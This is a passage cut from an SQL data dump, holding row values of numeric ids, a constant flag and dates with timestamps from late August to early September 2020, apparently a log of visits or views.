14:37:13'),(5545,91,1,'2020-08-26','2020-08-26 14:43:01'),(5546,68,1,'2020-08-26','2020-08-26 14:43:19'),(5547,2904,1,'2020-08-26','2020-08-26 14:43:22'),(5548,76,1,'2020-08-26','2020-08-26 14:43:31'),(5549,87,1,'2020-08-26','2020-08-26 14:45:15'),(5550,108,1,'2020-08-26','2020-08-26 14:49:09'),(5551,108,1,'2020-08-26','2020-08-26 14:49:10'),(5552,91,1,'2020-08-26','2020-08-26 14:49:41'),(5553,2904,1,'2020-08-26','2020-08-26 14:59:19'),(5554,1604,1,'2020-08-26','2020-08-26 15:05:44'),(5555,80,1,'2020-08-26','2020-08-26 15:05:52'),(5556,1604,1,'2020-08-26','2020-08-26 15:06:24'),(5557,80,1,'2020-08-26','2020-08-26 15:12:41'),(5558,108,1,'2020-08-26','2020-08-26 15:19:56'),(5559,74,1,'2020-08-26','2020-08-26 15:26:42'),(5560,3132,1,'2020-08-26','2020-08-26 15:26:56'),(5561,2503,1,'2020-08-26','2020-08-26 15:27:12'),(5562,68,1,'2020-08-26','2020-08-26 15:32:19'),(5563,68,1,'2020-08-26','2020-08-26 15:32:22'),(5564,108,1,'2020-08-26','2020-08-26 15:32:36'),(5565,1600,1,'2020-08-26','2020-08-26 17:15:57'),(5566,1600,1,'2020-08-26','2020-08-26 17:16:39'),(5567,473,1,'2020-08-26','2020-08-26 20:27:17'),(5568,89,1,'2020-08-26','2020-08-26 20:43:01'),(5569,89,1,'2020-08-26','2020-08-26 20:44:36'),(5570,68,1,'2020-08-26','2020-08-26 20:45:04'),(5571,72,1,'2020-08-26','2020-08-26 20:50:18'),(5572,3056,1,'2020-08-26','2020-08-26 20:51:01'),(5573,2503,1,'2020-08-26','2020-08-26 20:51:52'),(5574,335,1,'2020-08-26','2020-08-26 20:52:20'),(5575,473,1,'2020-08-26','2020-08-26 22:34:36'),(5576,68,1,'2020-08-26','2020-08-26 22:35:51'),(5577,3117,1,'2020-08-27','2020-08-27 01:42:37'),(5578,3124,1,'2020-08-27','2020-08-27 01:50:42'),(5579,3127,1,'2020-08-27','2020-08-27 01:56:20'),(5580,1614,1,'2020-08-27','2020-08-27 03:15:56'),(5581,486,1,'2020-08-27','2020-08-27 05:52:09'),(5582,80,1,'2020-08-27','2020-08-27 07:52:25'),(5583,80,1,'2020-08-27','2020-08-27 07:53:11'),(5584,1718,1,'2020-08-27','2020-08-27 10:22:22'),(5585,91,1,'2020-08-27','2020-08-27 10:31:50'),(5586,1600,1,'2020-08-27','2020-08-27 10:48:55'),(5587,3127,1,'2020-08-27','2020-08-27 10:58:16'),(5588,3127,1,'2020-08-27','2020-08-27 11:06:03'),(5589,68,1,'2020-08-27','2020-08-27 11:31:13'),(5590,474,1,'2020-08-27','2020-08-27 11:39:42'),(5591,84,1,'2020-08-27','2020-08-27 11:40:18'),(5592,87,1,'2020-08-27','2020-08-27 11:40:51'),(5593,1544,1,'2020-08-27','2020-08-27 11:51:21'),(5594,89,1,'2020-08-27','2020-08-27 11:51:42'),(5595,1614,1,'2020-08-27','2020-08-27 11:52:53'),(5596,1614,1,'2020-08-27','2020-08-27 11:55:56'),(5597,68,1,'2020-08-27','2020-08-27 12:08:00'),(5598,1600,1,'2020-08-27','2020-08-27 12:08:52'),(5599,76,1,'2020-08-27','2020-08-27 12:09:15'),(5600,1600,1,'2020-08-27','2020-08-27 12:09:38'),(5601,72,1,'2020-08-27','2020-08-27 12:19:06'),(5602,76,1,'2020-08-27','2020-08-27 12:24:09'),(5603,3127,1,'2020-08-27','2020-08-27 12:28:29'),(5604,72,1,'2020-08-27','2020-08-27 12:29:29'),(5605,570,1,'2020-08-27','2020-08-27 12:30:24'),(5606,80,1,'2020-08-27','2020-08-27 12:33:59'),(5607,68,1,'2020-08-27','2020-08-27 12:36:24'),(5608,80,1,'2020-08-27','2020-08-27 12:37:03'),(5609,80,1,'2020-08-27','2020-08-27 12:37:12'),(5610,1588,1,'2020-08-27','2020-08-27 12:46:13'),(5611,76,1,'2020-08-27','2020-08-27 12:46:56'),(5612,1588,1,'2020-08-27','2020-08-27 12:47:05'),(5613,80,1,'2020-08-27','2020-08-27 13:21:52'),(5614,1600,1,'2020-08-27','2020-08-27 13:58:05'),(5615,2503,1,'2020-08-27','2020-08-27 14:16:23'),(5616,2503,1,'2020-08-27','2020-08-27 14:31:37'),(5617,2503,1,'2020-08-27','2020-08-27 14:34:05'),(5618,2457,1,'2020-08-27','2020-08-27 14:37:03'),(5619,2457,1,'2020-08-27','2020-08-27 14:37:18'),(5620,84,1,'2020-08-27','2020-08-27 14:40:55'),(5621,1588,1,'2020-08-27','2020-08-27 14:41:31'),(5622,2904,1,'2020-08-27','2020-08-27 15:11:47'),(5623,2904,1,'2020-08-27','2020-08-27 15:13:56'),(5624,2503,1,'2020-08-27','2020-08-27 15:14:57'),(5625,1614,1,'2020-08-27','2020-08-27 15:49:03'),(5626,1600,1,'2020-08-27','2020-08-27 16:20:52'),(5627,1600,1,'2020-08-27','2020-08-27 18:47:47'),(5628,1600,1,'2020-08-27','2020-08-27 18:47:54'),(5629,1600,1,'2020-08-27','2020-08-27 18:53:02'),(5630,1772,1,'2020-08-27','2020-08-27 18:53:14'),(5631,570,1,'2020-08-27','2020-08-27 20:20:05'),(5632,2609,1,'2020-08-27','2020-08-27 20:32:00'),(5633,76,1,'2020-08-27','2020-08-27 20:32:20'),(5634,87,1,'2020-08-27','2020-08-27 20:32:40'),(5635,473,1,'2020-08-27','2020-08-27 20:32:50'),(5636,2989,1,'2020-08-27','2020-08-27 22:33:06'),(5637,2658,1,'2020-08-28','2020-08-28 00:50:33'),(5638,3069,1,'2020-08-28','2020-08-28 03:20:14'),(5639,2989,1,'2020-08-28','2020-08-28 05:42:13'),(5640,1614,1,'2020-08-28','2020-08-28 07:05:12'),(5641,1726,1,'2020-08-28','2020-08-28 07:47:44'),(5642,1726,1,'2020-08-28','2020-08-28 07:48:19'),(5643,91,1,'2020-08-28','2020-08-28 07:51:48'),(5644,2309,1,'2020-08-28','2020-08-28 08:18:15'),(5645,80,1,'2020-08-28','2020-08-28 09:43:36'),(5646,468,1,'2020-08-28','2020-08-28 09:47:42'),(5647,91,1,'2020-08-28','2020-08-28 09:55:17'),(5648,80,1,'2020-08-28','2020-08-28 09:59:33'),(5649,91,1,'2020-08-28','2020-08-28 11:03:40'),(5650,72,1,'2020-08-28','2020-08-28 11:14:27'),(5651,2658,1,'2020-08-28','2020-08-28 12:04:29'),(5652,3034,1,'2020-08-28','2020-08-28 12:04:59'),(5653,87,1,'2020-08-28','2020-08-28 12:20:44'),(5654,3127,1,'2020-08-28','2020-08-28 12:21:48'),(5655,1600,1,'2020-08-28','2020-08-28 12:28:54'),(5656,335,1,'2020-08-28','2020-08-28 12:30:19'),(5657,1600,1,'2020-08-28','2020-08-28 12:31:15'),(5658,2503,1,'2020-08-28','2020-08-28 12:51:20'),(5659,1614,1,'2020-08-28','2020-08-28 13:01:36'),(5660,1600,1,'2020-08-28','2020-08-28 14:03:36'),(5661,2904,1,'2020-08-28','2020-08-28 15:12:55'),(5662,1604,1,'2020-08-28','2020-08-28 16:53:22'),(5663,2991,1,'2020-08-28','2020-08-28 17:23:33'),(5664,1600,1,'2020-08-28','2020-08-28 21:19:56'),(5665,1594,1,'2020-08-28','2020-08-28 22:09:13'),(5666,3127,1,'2020-08-28','2020-08-28 22:20:02'),(5667,3127,1,'2020-08-28','2020-08-28 22:20:05'),(5668,2159,1,'2020-08-28','2020-08-28 22:33:22'),(5669,1718,1,'2020-08-28','2020-08-28 23:15:24'),(5670,2609,1,'2020-08-28','2020-08-28 23:45:34'),(5671,2609,1,'2020-08-29','2020-08-29 03:30:00'),(5672,80,1,'2020-08-29','2020-08-29 07:59:39'),(5673,3127,1,'2020-08-29','2020-08-29 07:59:54'),(5674,1600,1,'2020-08-29','2020-08-29 08:24:18'),(5675,1614,1,'2020-08-29','2020-08-29 08:46:12'),(5676,1600,1,'2020-08-29','2020-08-29 10:21:36'),(5677,2309,1,'2020-08-29','2020-08-29 12:49:26'),(5678,2813,1,'2020-08-29','2020-08-29 12:50:55'),(5679,2503,1,'2020-08-29','2020-08-29 14:37:41'),(5680,87,1,'2020-08-29','2020-08-29 14:38:14'),(5681,2609,1,'2020-08-29','2020-08-29 15:19:24'),(5682,3127,1,'2020-08-29','2020-08-29 15:45:47'),(5683,1600,1,'2020-08-29','2020-08-29 16:25:45'),(5684,1600,1,'2020-08-29','2020-08-29 16:42:12'),(5685,1745,1,'2020-08-29','2020-08-29 16:43:30'),(5686,1600,1,'2020-08-29','2020-08-29 16:43:59'),(5687,1600,1,'2020-08-29','2020-08-29 18:31:10'),(5688,1604,1,'2020-08-30','2020-08-30 01:44:19'),(5689,2410,1,'2020-08-30','2020-08-30 12:27:35'),(5690,3045,1,'2020-08-30','2020-08-30 15:10:54'),(5691,1588,1,'2020-08-30','2020-08-30 15:38:39'),(5692,2309,1,'2020-08-30','2020-08-30 20:58:54'),(5693,1596,1,'2020-08-31','2020-08-31 09:14:23'),(5694,76,1,'2020-08-31','2020-08-31 10:48:11'),(5695,68,1,'2020-08-31','2020-08-31 10:48:26'),(5696,89,1,'2020-08-31','2020-08-31 10:48:40'),(5697,3124,1,'2020-08-31','2020-08-31 11:03:42'),(5698,3127,1,'2020-08-31','2020-08-31 11:04:53'),(5699,1588,1,'2020-08-31','2020-08-31 11:26:39'),(5700,1606,1,'2020-08-31','2020-08-31 11:40:00'),(5701,80,1,'2020-08-31','2020-08-31 11:40:14'),(5702,80,1,'2020-08-31','2020-08-31 11:40:28'),(5703,1774,1,'2020-08-31','2020-08-31 12:09:32'),(5704,468,1,'2020-08-31','2020-08-31 12:36:00'),(5705,1604,1,'2020-08-31','2020-08-31 12:42:50'),(5706,91,1,'2020-08-31','2020-08-31 13:13:31'),(5707,1780,1,'2020-08-31','2020-08-31 13:13:54'),(5708,68,1,'2020-08-31','2020-08-31 14:28:05'),(5709,1604,1,'2020-08-31','2020-08-31 19:44:47'),(5710,76,1,'2020-08-31','2020-08-31 19:45:32'),(5711,76,1,'2020-08-31','2020-08-31 19:45:56'),(5712,1604,1,'2020-08-31','2020-08-31 19:45:58'),(5713,3056,1,'2020-08-31','2020-08-31 23:48:24'),(5714,2309,1,'2020-09-01','2020-09-01 00:36:59'),(5715,68,1,'2020-09-01','2020-09-01 02:49:49'),(5716,3127,1,'2020-09-01','2020-09-01 03:05:28'),(5717,1730,1,'2020-09-01','2020-09-01 05:16:15'),(5718,1730,1,'2020-09-01','2020-09-01 05:16:39'),(5719,1588,1,'2020-09-01','2020-09-01 05:20:53'),(5720,2309,1,'2020-09-01','2020-09-01 06:29:38'),(5721,1600,1,'2020-09-01','2020-09-01 06:54:43'),(5722,1600,1,'2020-09-01','2020-09-01 07:21:21'),(5723,3027,1,'2020-09-01','2020-09-01 08:43:12'),(5724,2457,1,'2020-09-01','2020-09-01 09:53:45'),(5725,1604,1,'2020-09-01','2020-09-01 09:55:10'),(5726,76,1,'2020-09-01','2020-09-01 09:56:09'),(5727,1604,1,'2020-09-01','2020-09-01 09:56:45'),(5728,1600,1,'2020-09-01','2020-09-01 12:22:40'),(5729,1600,1,'2020-09-01','2020-09-01 12:22:41'),(5730,3127,1,'2020-09-01','2020-09-01 14:54:47'),(5731,91,1,'2020-09-01','2020-09-01 15:16:02'),(5732,3117,1,'2020-09-01','2020-09-01 16:20:51'),(5733,68,1,'2020-09-01','2020-09-01 23:17:13'),(5734,84,1,'2020-09-01','2020-09-01 23:29:07'),(5735,68,1,'2020-09-01','2020-09-01 23:34:50'),(5736,1614,1,'2020-09-01','2020-09-01 23:50:50'),(5737,3127,1,'2020-09-02','2020-09-02 04:53:16'),(5738,89,1,'2020-09-02','2020-09-02 11:04:22'),(5739,108,1,'2020-09-02','2020-09-02 11:37:17'),(5740,2309,1,'2020-09-02','2020-09-02 11:38:49'),(5741,2309,1,'2020-09-02','2020-09-02 11:39:03'),(5742,108,1,'2020-09-02','2020-09-02 11:52:55'),(5743,3045,1,'2020-09-02','2020-09-02 12:14:14'),(5744,3127,1,'2020-09-02','2020-09-02 12:53:49'),(5745,1598,1,'2020-09-02','2020-09-02 13:11:27'),(5746,80,1,'2020-09-02','2020-09-02 14:46:06'),(5747,80,1,'2020-09-02','2020-09-02 14:49:50'),(5748,84,1,'2020-09-02','2020-09-02 14:50:16'),(5749,2309,1,'2020-09-02','2020-09-02 16:38:01'),(5750,1604,1,'2020-09-02','2020-09-02 17:42:14'),(5751,1598,1,'2020-09-02','2020-09-02 18:52:33'),(5752,91,1,'2020-09-02','2020-09-02 21:44:19'),(5753,108,1,'2020-09-02','2020-09-02 22:13:07'),(5754,1713,1,'2020-09-02','2020-09-02 23:33:38'),(5755,76,1,'2020-09-03','2020-09-03 09:43:11'),(5756,89,1,'2020-09-03','2020-09-03 10:34:28'),(5757,1586,1,'2020-09-03','2020-09-03 10:34:46'),(5758,486,1,'2020-09-03','2020-09-03 13:04:14'),(5759,2904,1,'2020-09-03','2020-09-03 13:25:31'),(5760,1600,1,'2020-09-03','2020-09-03 13:26:50'),(5761,1745,1,'2020-09-03','2020-09-03 13:32:30'),(5762,1600,1,'2020-09-03','2020-09-03 13:33:49'),(5763,1600,1,'2020-09-03','2020-09-03 13:59:41'),(5764,486,1,'2020-09-03','2020-09-03 15:04:29'),(5765,2165,1,'2020-09-03','2020-09-03 15:41:41'),(5766,1600,1,'2020-09-03','2020-09-03 17:08:18'),(5767,1600,1,'2020-09-03','2020-09-03 18:09:35'),(5768,1766,1,'2020-09-04','2020-09-04 03:46:45'),(5769,76,1,'2020-09-04','2020-09-04 03:50:06'),(5770,87,1,'2020-09-04','2020-09-04 03:50:45'),(5771,3104,1,'2020-09-04','2020-09-04 03:51:31'),(5772,2751,1,'2020-09-04','2020-09-04 06:08:13'),(5773,1600,1,'2020-09-04','2020-09-04 10:15:10'),(5774,80,1,'2020-09-04','2020-09-04 10:15:55'),(5775,570,1,'2020-09-04','2020-09-04 10:56:02'),(5776,1730,1,'2020-09-04','2020-09-04 14:45:14'),(5777,570,1,'2020-09-04','2020-09-04 15:05:45'),(5778,3038,1,'2020-09-04','2020-09-04 15:13:30'),(5779,1600,1,'2020-09-04','2020-09-04 15:46:29'),(5780,2457,1,'2020-09-04','2020-09-04 19:16:21'),(5781,1598,1,'2020-09-04','2020-09-04 19:26:25'),(5782,3034,1,'2020-09-04','2020-09-04 19:36:31'),(5783,3104,1,'2020-09-04','2020-09-04 19:49:25'),(5784,2911,1,'2020-09-04','2020-09-04 19:58:15'),(5785,2813,1,'2020-09-04','2020-09-04 19:58:56'),(5786,3109,1,'2020-09-04','2020-09-04 20:06:19'),(5787,2609,1,'2020-09-04','2020-09-04 20:17:12'),(5788,2309,1,'2020-09-04','2020-09-04 20:26:14'),(5789,1600,1,'2020-09-04','2020-09-04 20:26:18'),(5790,3051,1,'2020-09-04','2020-09-04 20:57:08'),(5791,1703,1,'2020-09-04','2020-09-04 21:08:17'),(5792,1734,1,'2020-09-04','2020-09-04 21:08:58'),(5793,1588,1,'2020-09-04','2020-09-04 21:16:58'),(5794,1588,1,'2020-09-04','2020-09-04 21:27:10'),(5795,3107,1,'2020-09-04','2020-09-04 21:55:23'),(5796,1766,1,'2020-09-04','2020-09-04 21:58:15'),(5797,2775,1,'2020-09-04','2020-09-04 22:08:15'),(5798,1718,1,'2020-09-04','2020-09-04 22:20:50'),(5799,1604,1,'2020-09-04','2020-09-04 22:24:35'),(5800,2297,1,'2020-09-04','2020-09-04 22:47:48'),(5801,2410,1,'2020-09-04','2020-09-04 22:47:56'),(5802,2152,1,'2020-09-04','2020-09-04 22:57:46'),(5803,91,1,'2020-09-04','2020-09-04 23:07:45'),(5804,469,1,'2020-09-04','2020-09-04 23:14:24'),(5805,1745,1,'2020-09-04','2020-09-04 23:18:47'),(5806,2609,1,'2020-09-04','2020-09-04 23:27:44'),(5807,1582,1,'2020-09-04','2020-09-04 23:29:08'),(5808,3127,1,'2020-09-04','2020-09-04 23:58:04'),(5809,68,1,'2020-09-04','2020-09-04 23:58:12'),(5810,1582,1,'2020-09-05','2020-09-05 00:07:50'),(5811,478,1,'2020-09-05','2020-09-05 00:12:48'),(5812,3090,1,'2020-09-05','2020-09-05 00:18:23'),(5813,2457,1,'2020-09-05','2020-09-05 00:28:51'),(5814,3124,1,'2020-09-05','2020-09-05 00:28:58'),(5815,468,1,'2020-09-05','2020-09-05 00:54:09'),(5816,570,1,'2020-09-05','2020-09-05 01:09:10'),(5817,1600,1,'2020-09-05','2020-09-05 01:19:14'),(5818,72,1,'2020-09-05','2020-09-05 02:26:08'),(5819,89,1,'2020-09-05','2020-09-05 02:38:50'),(5820,1614,1,'2020-09-05','2020-09-05 02:57:23'),(5821,3102,1,'2020-09-05','2020-09-05 03:47:56'),(5822,3005,1,'2020-09-05','2020-09-05 03:49:22'),(5823,1588,1,'2020-09-05','2020-09-05 04:18:47'),(5824,1588,1,'2020-09-05','2020-09-05 04:23:07'),(5825,2804,1,'2020-09-05','2020-09-05 04:41:04'),(5826,3104,1,'2020-09-05','2020-09-05 07:17:58'),(5827,2609,1,'2020-09-05','2020-09-05 07:27:26'),(5828,2904,1,'2020-09-05','2020-09-05 07:33:38'),(5829,2309,1,'2020-09-05','2020-09-05 08:01:21'),(5830,3107,1,'2020-09-05','2020-09-05 08:05:46'),(5831,84,1,'2020-09-05','2020-09-05 08:09:08'),(5832,76,1,'2020-09-05','2020-09-05 08:10:23'),(5833,1766,1,'2020-09-05','2020-09-05 08:31:40'),(5834,1588,1,'2020-09-05','2020-09-05 08:35:39'),(5835,1730,1,'2020-09-05','2020-09-05 08:43:57'),(5836,3072,1,'2020-09-05','2020-09-05 08:48:19'),(5837,335,1,'2020-09-05','2020-09-05 09:07:02'),(5838,3127,1,'2020-09-05','2020-09-05 09:09:31'),(5839,91,1,'2020-09-05','2020-09-05 09:09:36'),(5840,1582,1,'2020-09-05','2020-09-05 09:19:02'),(5841,2991,1,'2020-09-05','2020-09-05 09:36:08'),(5842,2410,1,'2020-09-05','2020-09-05 10:40:40'),(5843,2989,1,'2020-09-05','2020-09-05 11:27:41'),(5844,2989,1,'2020-09-05','2020-09-05 11:28:22'),(5845,2410,1,'2020-09-05','2020-09-05 11:42:58'),(5846,1614,1,'2020-09-05','2020-09-05 12:15:37'),(5847,1588,1,'2020-09-05','2020-09-05 12:35:56'),(5848,1600,1,'2020-09-05','2020-09-05 12:35:58'),(5849,2148,1,'2020-09-05','2020-09-05 12:45:50'),(5850,76,1,'2020-09-05','2020-09-05 12:52:52'),(5851,570,1,'2020-09-05','2020-09-05 12:55:40'),(5852,2457,1,'2020-09-05','2020-09-05 13:15:26'),(5853,2769,1,'2020-09-05','2020-09-05 13:25:10'),(5854,3081,1,'2020-09-05','2020-09-05 13:45:35'),(5855,3102,1,'2020-09-05','2020-09-05 13:50:28'),(5856,72,1,'2020-09-05','2020-09-05 14:15:35'),(5857,2457,1,'2020-09-05','2020-09-05 14:46:30'),(5858,3104,1,'2020-09-05','2020-09-05 15:00:30'),(5859,2609,1,'2020-09-05','2020-09-05 15:17:20'),(5860,2309,1,'2020-09-05','2020-09-05 15:26:46'),(5861,1600,1,'2020-09-05','2020-09-05 15:36:54'),(5862,2904,1,'2020-09-05','2020-09-05 16:06:51'),(5863,1730,1,'2020-09-05','2020-09-05 16:09:00'),(5864,1588,1,'2020-09-05','2020-09-05 16:16:52'),(5865,76,1,'2020-09-05','2020-09-05 16:17:20'),(5866,1594,1,'2020-09-05','2020-09-05 16:26:49'),(5867,1718,1,'2020-09-05','2020-09-05 16:37:00'),(5868,3027,1,'2020-09-05','2020-09-05 17:04:26'),(5869,2775,1,'2020-09-05','2020-09-05 17:07:47'),(5870,3107,1,'2020-09-05','2020-09-05 17:31:50'),(5871,2658,1,'2020-09-05','2020-09-05 17:37:47'),(5872,1582,1,'2020-09-05','2020-09-05 17:58:39'),(5873,108,1,'2020-09-05','2020-09-05 18:08:17'),(5874,1582,1,'2020-09-05','2020-09-05 18:38:13'),(5875,91,1,'2020-09-05','2020-09-05 18:38:22'),(5876,335,1,'2020-09-05','2020-09-05 18:48:33'),(5877,3127,1,'2020-09-05','2020-09-05 19:29:49'),(5878,89,1,'2020-09-05','2020-09-05 19:38:55'),(5879,2911,1,'2020-09-05','2020-09-05 19:56:53'),(5880,1730,1,'2020-09-05','2020-09-05 20:08:40'),(5881,3090,1,'2020-09-05','2020-09-05 20:18:38'),(5882,3109,1,'2020-09-05','2020-09-05 20:28:30'),(5883,2751,1,'2020-09-05','2020-09-05 20:49:10'),(5884,1614,1,'2020-09-05','2020-09-05 21:08:58'),(5885,1598,1,'2020-09-05','2020-09-05 21:48:49'),(5886,84,1,'2020-09-05','2020-09-05 21:50:47'),(5887,3034,1,'2020-09-05','2020-09-05 22:01:10'),(5888,74,1,'2020-09-05','2020-09-05 22:08:48'),(5889,2813,1,'2020-09-05','2020-09-05 22:16:53'),(5890,1782,1,'2020-09-05','2020-09-05 22:19:22'),(5891,2297,1,'2020-09-05','2020-09-05 22:29:19'),(5892,1600,1,'2020-09-05','2020-09-05 23:09:45'),(5893,1709,1,'2020-09-05','2020-09-05 23:09:54'),(5894,468,1,'2020-09-05','2020-09-05 23:49:37'),(5895,2609,1,'2020-09-06','2020-09-06 00:30:12'),(5896,3104,1,'2020-09-06','2020-09-06 00:41:31'),(5897,1606,1,'2020-09-06','2020-09-06 00:49:40'),(5898,2457,1,'2020-09-06','2020-09-06 00:49:52'),(5899,3102,1,'2020-09-06','2020-09-06 00:57:18'),(5900,2617,1,'2020-09-06','2020-09-06 01:29:38'),(5901,1600,1,'2020-09-06','2020-09-06 01:39:28'),(5902,2309,1,'2020-09-06','2020-09-06 01:59:38'),(5903,2904,1,'2020-09-06','2020-09-06 02:09:37'),(5904,1588,1,'2020-09-06','2020-09-06 02:19:59'),(5905,1730,1,'2020-09-06','2020-09-06 02:29:48'),(5906,1588,1,'2020-09-06','2020-09-06 02:40:09'),(5907,1594,1,'2020-09-06','2020-09-06 02:50:17'),(5908,2751,1,'2020-09-06','2020-09-06 03:00:11'),(5909,76,1,'2020-09-06','2020-09-06 03:10:13'),(5910,2609,1,'2020-09-06','2020-09-06 03:10:24'),(5911,1718,1,'2020-09-06','2020-09-06 03:30:24'),(5912,3107,1,'2020-09-06','2020-09-06 04:17:35'),(5913,91,1,'2020-09-06','2020-09-06 04:30:23'),(5914,2989,1,'2020-09-06','2020-09-06 04:40:26'),(5915,76,1,'2020-09-06','2020-09-06 05:10:20'),(5916,3127,1,'2020-09-06','2020-09-06 05:10:26'),(5917,335,1,'2020-09-06','2020-09-06 05:20:42'),(5918,3090,1,'2020-09-06','2020-09-06 05:39:23'),(5919,89,1,'2020-09-06','2020-09-06 05:41:02'),(5920,1730,1,'2020-09-06','2020-09-06 06:10:43'),(5921,3109,1,'2020-09-06','2020-09-06 06:11:22'),(5922,1614,1,'2020-09-06','2020-09-06 06:44:52'),(5923,3104,1,'2020-09-06','2020-09-06 07:30:45'),(5924,485,1,'2020-09-06','2020-09-06 07:30:59'),(5925,2813,1,'2020-09-06','2020-09-06 07:42:19'),(5926,570,1,'2020-09-06','2020-09-06 08:11:09'),(5927,1600,1,'2020-09-06','2020-09-06 08:11:19'),(5928,2457,1,'2020-09-06','2020-09-06 08:31:20'),(5929,1600,1,'2020-09-06','2020-09-06 08:34:22'),(5930,1600,1,'2020-09-06','2020-09-06 08:34:25'),(5931,2769,1,'2020-09-06','2020-09-06 09:01:40'),(5932,84,1,'2020-09-06','2020-09-06 09:11:49'),(5933,74,1,'2020-09-06','2020-09-06 09:11:50'),(5934,2609,1,'2020-09-06','2020-09-06 09:42:18'),(5935,2297,1,'2020-09-06','2020-09-06 10:02:57'),(5936,2297,1,'2020-09-06','2020-09-06 10:03:36'),(5937,3102,1,'2020-09-06','2020-09-06 10:12:43'),(5938,80,1,'2020-09-06','2020-09-06 10:12:47'),(5939,1598,1,'2020-09-06','2020-09-06 10:22:41'),(5940,72,1,'2020-09-06','2020-09-06 10:22:44'),(5941,3005,1,'2020-09-06','2020-09-06 10:42:41'),(5942,108,1,'2020-09-06','2020-09-06 10:52:49'),(5943,3079,1,'2020-09-06','2020-09-06 11:03:01'),(5944,2309,1,'2020-09-06','2020-09-06 11:23:02'),(5945,2904,1,'2020-09-06','2020-09-06 11:53:43'),(5946,1588,1,'2020-09-06','2020-09-06 12:03:12'),(5947,2609,1,'2020-09-06','2020-09-06 12:23:13'),(5948,2609,1,'2020-09-06','2020-09-06 12:24:45'),(5949,76,1,'2020-09-06','2020-09-06 12:33:42'),(5950,1718,1,'2020-09-06','2020-09-06 12:43:00'),(5951,1594,1,'2020-09-06','2020-09-06 12:52:52'),(5952,2989,1,'2020-09-06','2020-09-06 13:03:20'),(5953,1582,1,'2020-09-06','2020-09-06 13:22:54'),(5954,91,1,'2020-09-06','2020-09-06 13:43:11'),(5955,335,1,'2020-09-06','2020-09-06 14:22:52'),(5956,3127,1,'2020-09-06','2020-09-06 14:49:09'),(5957,3090,1,'2020-09-06','2020-09-06 15:03:55'),(5958,3107,1,'2020-09-06','2020-09-06 15:09:51'),(5959,2775,1,'2020-09-06','2020-09-06 15:42:55'),(5960,1600,1,'2020-09-06','2020-09-06 16:51:10'),(5961,1604,1,'2020-09-06','2020-09-06 17:03:36'),(5962,570,1,'2020-09-06','2020-09-06 17:10:25'),(5963,1604,1,'2020-09-06','2020-09-06 17:19:39'),(5964,2457,1,'2020-09-06','2020-09-06 17:20:46'),(5965,3034,1,'2020-09-06','2020-09-06 17:53:42'),(5966,89,1,'2020-09-06','2020-09-06 18:20:28'),(5967,87,1,'2020-09-06','2020-09-06 18:30:28'),(5968,1730,1,'2020-09-06','2020-09-06 18:40:18'),(5969,80,1,'2020-09-06','2020-09-06 19:10:33'),(5970,2609,1,'2020-09-06','2020-09-06 19:20:29'),(5971,72,1,'2020-09-06','2020-09-06 19:30:58'),(5972,3104,1,'2020-09-06','2020-09-06 19:46:23'),(5973,468,1,'2020-09-06','2020-09-06 20:00:55'),(5974,2309,1,'2020-09-06','2020-09-06 20:11:47'),(5975,2457,1,'2020-09-06','2020-09-06 20:31:09'),(5976,108,1,'2020-09-06','2020-09-06 20:31:24'),(5977,84,1,'2020-09-06','2020-09-06 21:01:07'),(5978,3102,1,'2020-09-06','2020-09-06 21:11:43'),(5979,3109,1,'2020-09-06','2020-09-06 21:21:36'),(5980,3027,1,'2020-09-06','2020-09-06 21:52:02'),(5981,74,1,'2020-09-06','2020-09-06 22:01:32'),(5982,2297,1,'2020-09-06','2020-09-06 22:12:42'),(5983,3058,1,'2020-09-06','2020-09-06 22:42:18'),(5984,3030,1,'2020-09-06','2020-09-06 22:52:08'),(5985,3034,1,'2020-09-07','2020-09-07 01:05:46'),(5986,76,1,'2020-09-07','2020-09-07 01:07:42'),(5987,2309,1,'2020-09-07','2020-09-07 01:17:15'),(5988,1594,1,'2020-09-07','2020-09-07 01:47:30'),(5989,1614,1,'2020-09-07','2020-09-07 02:37:50'),(5990,89,1,'2020-09-07','2020-09-07 04:17:59'),(5991,1588,1,'2020-09-07','2020-09-07 04:37:48'),(5992,1600,1,'2020-09-07','2020-09-07 04:47:30'),(5993,3107,1,'2020-09-07','2020-09-07 05:23:33'),(5994,1588,1,'2020-09-07','2020-09-07 05:23:58'),(5995,1724,1,'2020-09-07','2020-09-07 05:24:26'),(5996,1588,1,'2020-09-07','2020-09-07 05:25:02'),(5997,1726,1,'2020-09-07','2020-09-07 05:25:16'),(5998,3081,1,'2020-09-07','2020-09-07 06:04:26'),(5999,1606,1,'2020-09-07','2020-09-07 06:17:36'),(6000,2411,1,'2020-09-07','2020-09-07 06:17:43'),(6001,91,1,'2020-09-07','2020-09-07 06:57:27'),(6002,3030,1,'2020-09-07','2020-09-07 07:21:40'),(6003,91,1,'2020-09-07','2020-09-07 07:27:51'),(6004,2609,1,'2020-09-07','2020-09-07 08:39:46'),(6005,2159,1,'2020-09-07','2020-09-07 09:01:41'),(6006,2159,1,'2020-09-07','2020-09-07 09:02:14'),(6007,3058,1,'2020-09-07','2020-09-07 09:05:44'),(6008,2904,1,'2020-09-07','2020-09-07 09:07:16'),(6009,3030,1,'2020-09-07','2020-09-07 10:08:17'),(6010,2457,1,'2020-09-07','2020-09-07 10:37:59'),(6011,87,1,'2020-09-07','2020-09-07 10:38:34'),(6012,570,1,'2020-09-07','2020-09-07 11:08:11'),(6013,2309,1,'2020-09-07','2020-09-07 11:38:34'),(6014,1598,1,'2020-09-07','2020-09-07 11:42:41'),(6015,3060,1,'2020-09-07','2020-09-07 12:18:47'),(6016,108,1,'2020-09-07','2020-09-07 12:28:11'),(6017,570,1,'2020-09-07','2020-09-07 12:38:17'),(6018,1718,1,'2020-09-07','2020-09-07 12:58:21'),(6019,1600,1,'2020-09-07','2020-09-07 13:59:51'),(6020,1588,1,'2020-09-07','2020-09-07 14:08:26'),(6021,3034,1,'2020-09-07','2020-09-07 14:26:57'),(6022,2309,1,'2020-09-07','2020-09-07 14:38:18'),(6023,1604,1,'2020-09-07','2020-09-07 15:01:19'),(6024,91,1,'2020-09-07','2020-09-07 15:28:11'),(6025,2989,1,'2020-09-07','2020-09-07 16:26:23'),(6026,1737,1,'2020-09-07','2020-09-07 16:28:29'),(6027,2989,1,'2020-09-07','2020-09-07 16:42:29'),(6028,2989,1,'2020-09-07','2020-09-07 16:44:24'),(6029,2609,1,'2020-09-07','2020-09-07 17:18:31'),(6030,1600,1,'2020-09-07','2020-09-07 17:28:22'),(6031,1614,1,'2020-09-07','2020-09-07 17:38:32'),(6032,3058,1,'2020-09-07','2020-09-07 